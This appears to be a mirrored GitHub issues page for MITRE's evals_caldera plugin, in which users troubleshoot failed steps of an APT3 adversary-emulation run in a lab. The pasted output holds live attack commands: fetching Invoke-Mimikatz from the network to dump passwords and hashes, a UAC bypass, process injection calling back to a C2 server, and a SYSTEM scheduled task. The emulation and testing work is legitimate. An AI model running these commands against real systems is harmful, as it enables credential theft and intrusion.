mitre-attack / evals_caldera Goto Github PK
View Code? Open in Web Editor NEWA CALDERA plugin for ATT&CK Evaluations Round 1
License: Apache License 2.0
evals_caldera's People
Stargazers
Watchers
Forkers
d4weiss 3v1lw1th1n benhe119 clenk 5l1v3r1 woainiliuying recvfrom malached masterscott muhaimin-confluera morpheusme heraldt cyanitol-backup ethicalsecurity-agency chriss-0x01evals_caldera's Issues
Documentation link is broken.
The link in the readme Please read the full documentation for this plugin. is dead.
I have searched through the readthe readthedocs documentation but see nothing about the eval plugin to update the link to.
[Plugin - Phase 16 ] 5.B.1 - Access Token Manipulation (T1134), 6.A.1 - Query Registry (T1012), 7.B.1 - Remote File Copy (T1105), 7.C.1 - Scheduled Tasks (T1053), 8.A.1/2 - File and Directory Discovery (T1083)
Good evening,
this issue goes along with:
because they are from the same setup and operation execution (APT3 - Full)
When I got to 5.B.1 - Access Token Manipulation (T1134), 6.A.1 - Query Registry (T1012), 7.B.1 - Remote File Copy (T1105), 7.C.1 - Scheduled Tasks (T1053), 8.A.1/2 - File and Directory Discovery (T1083) I got the following message:
Import-Module .\StealToken.ps1 -Verbose -Force;StealToken;CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\\\FILE001\secrets\hklm\system\currentcontrolset\control\terminal server"';CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe http://172.18.39.8:8888 evals" /sc ONLOGON /RU SYSTEM';CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b \\FILE001\secrets';CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%';RevertToSelf;
Payload(s) not available: sandcat.exe
I was a little confused with the "sandcat.exe" binary. It is in C:\users\public\sandcat.exe as shown below:
and this is because when I ran the PowerShell command, it downloaded it there:
However, I believe the script believes it is on the path where the session is running from? Maybe?. However, as you can see below, I ran the powershell script from the users pgustavo default path. I dont know if this makes sense? ๐
Does it make sense to update the script and set it to point to C:\users\public\sandcat.exe since it is the default location for when it is downloaded? or I can just download the payload and run it from wherever I want? You guys have this in the WIki Step 1 began with a legitimate user executing the payload on the victim host.. I believe that maybe an additional comment can be added to the WIKI to be very specific on why you need to download it rather than using the other options available in Caldera for initial access? Maybe?. Just sharing some thoughts and my initial test ๐ . I am so happy the other other steps worked perfectly fine and I was able to collect the data generated by each step ๐ .
Thank you in advance!
[Plugin - Phase 10 - 3.B.1] Process Discovery (T1057), 3.C.1 - Process Injection (T1055)
Good evening,
This issue goes along with the one here: #1 since it has the same setup and operation execution/
As described in the previous issue, I also had two processes running as administrator (right click on cmd and powershell and ran them as Administrator) . I believe since the previous step Phase 9 - 3.A.1 failed as shown in here #1 (bypassUAC), this step could not run properly.
Output:
Import-Module .\Invoke-PSInject.ps1 -Verbose -Force;Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force;$pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('http://172.18.39.8:8888')"));Inject -PoshCode $pcode;
VERBOSE: Loading module from path 'C:\Users\pgustavo\Invoke-PSInject.ps1'.
VERBOSE: Dot-sourcing the script file 'C:\Users\pgustavo\Invoke-PSInject.ps1'.
Get-Process : The 'IncludeUserName' parameter requires elevated user rights. Try running the command again
in a session that has been opened with elevated user rights (that is, Run as Administrator).
At C:\Users\pgustavo\Invoke-PSInject.ps1:3583 char:5
+ Get-Process -IncludeUserName | Where-Object { $_.UserName -like " ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Get-Process], InvalidOperationException
+ FullyQualifiedErrorId : IncludeUserNameRequiresElevation,Microsoft.PowerShell.Commands.GetProcessComm
and
According to the description of this step:
BypassUAC failed first, so it makes sense I guess that this step did not work.
One thing to mention too is that the plugin says that Phase 10 - 3.B.1 step ran successfully. However, as shown above, it did not. A screen shot:
Thank you in advance!
[Plugin Phases 14 & 15 ] 5.A.1 - Credential Dumping (T1003) & 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055) - Mimikatz Update
Good evening team,
This issue goes along with:
because they are from the same setup and operation execution (APT3 - Full)
When I got to steps 5.A.1 - Credential Dumping (T1003) & 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055) , Mimikatz failed to run.
Script step 5.A.1 : https://github.com/mitre-attack/evals_caldera/blob/1b3f5ffc882d8f46e689a134137af8138f3a43d0/data/abilities/credential-access/4ef6009d-2d62-4bb4-8de9-0458df2e9567.yml
Output:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1");iex $result;function logonpasswords{ Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords exit"};logonpasswords;
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+ $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : AmbiguousMatchException
You cannot call a method on a null-valued expression.
At line:893 char:9
+ Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
Cannot find an overload for "GetDelegateForFunctionPointer" and the argument count: "2".
At line:489 char:9
+ $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::Get ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodCountCouldNotFindBest
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+ $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : AmbiguousMatchException
You cannot call a method on a null-valued expression.
At line:893 char:9
+ Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
and more...
Script step 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055): https://github.com/mitre-attack/evals_caldera/blob/1b3f5ffc882d8f46e689a134137af8138f3a43d0/data/abilities/credential-access/effbedc1-1bc8-4a75-9395-980559700008.yml
Output:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1");iex $result;function hashdump{ Invoke-Mimikatz -Command "privilege::debug token::elevate lsadump::sam exit"};hashdump;
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+ $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : AmbiguousMatchException
You cannot call a method on a null-valued expression.
At line:893 char:9
+ Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
Cannot find an overload for "GetDelegateForFunctionPointer" and the argument count: "2".
At line:489 char:9
+ $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::Get ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodCountCouldNotFindBest
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+ $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : AmbiguousMatchException
You cannot call a method on a null-valued expression.
At line:893 char:9
+ Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
and more..
I was doing some reading and also remembered seeing something similar when playing with Empire (master branch). I remember switching to DEV branch and it worked properly with WIn10. Remember I am using The Shire Mordor Environment and my workstations are Win10 and Servers are Win 2019. They are all configured to the setup standards from the evals.
I also saw this issue in the Caldera repo which confirmed what I was thinking when I saw those initial error messages: mitre/caldera#38
I confirmed that Mimikatz in Empire Master branch does not have that fix applied. However, DEV branch does have it. I believe the following needs to be updated then:
I can submit a PR too, but I wanted to first check with you guys. I will give it a try with those two fixes soon.
Thank you in advance!
[Plugin - Phase 9 - 3.A.1] Bypass User Account Control (T1088)
Good evening,
First, I wanted to say thank you for all your work on this plugin! ๐
Im running the APT3 Round1 Day1 scenario in The Shire Mordor Environment, and I got Caldera setup and ready to run the plugin.
Victim: IT001.shire.com
IP: 172.18.39.105
User: pgustavo
I ran sandcat via powershell as shown below
I also had two processes running as administrator (right click on cmd and powershell and ran them as Administrators)
I started the operation:
And everything was going well until i got to Phase 9 - 3.A.1
Output:
Import-Module .\Invoke-BypassUACTokenManipulation.ps1 -Verbose -Force;Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force;$pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('http://172.18.39.8:8888')"));Invoke-BypassUACTokenManipulation -Arguments "-nop -exec bypass -EncodedCommand $pcode" -Verbose
VERBOSE: Loading module from path 'C:\Users\pgustavo\Invoke-BypassUACTokenManipulation.ps1'.
VERBOSE: Dot-sourcing the script file 'C:\Users\pgustavo\Invoke-BypassUACTokenManipulation.ps1'.
VERBOSE: Enumerating Process list...
VERBOSE: HI Proc found. ID: 3356 684 7440 2668 7724
VERBOSE: [*] Successfully acquired cmd conhost conhost ctfmon powershell handle
VERBOSE: [*] Opened process token
VERBOSE: [*] Duplicated process token
True
VERBOSE: [*] Lowered token mandatory IL
VERBOSE: [*] Created restricted token
VERBOSE: [*] Duplicated restricted token
Requested registry access is not allowed.
Is there anything I can do to troubleshoot this error? I don't have much experience with that script, so I am not sure if it is something I need to do to my box setup to get it to work.
Thank you in advance!
server.py fileld to start
Service cannot load evals after adding evals plugin๏ผload_data() got an unexpected keyword argument "directory",please help me,thank you
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.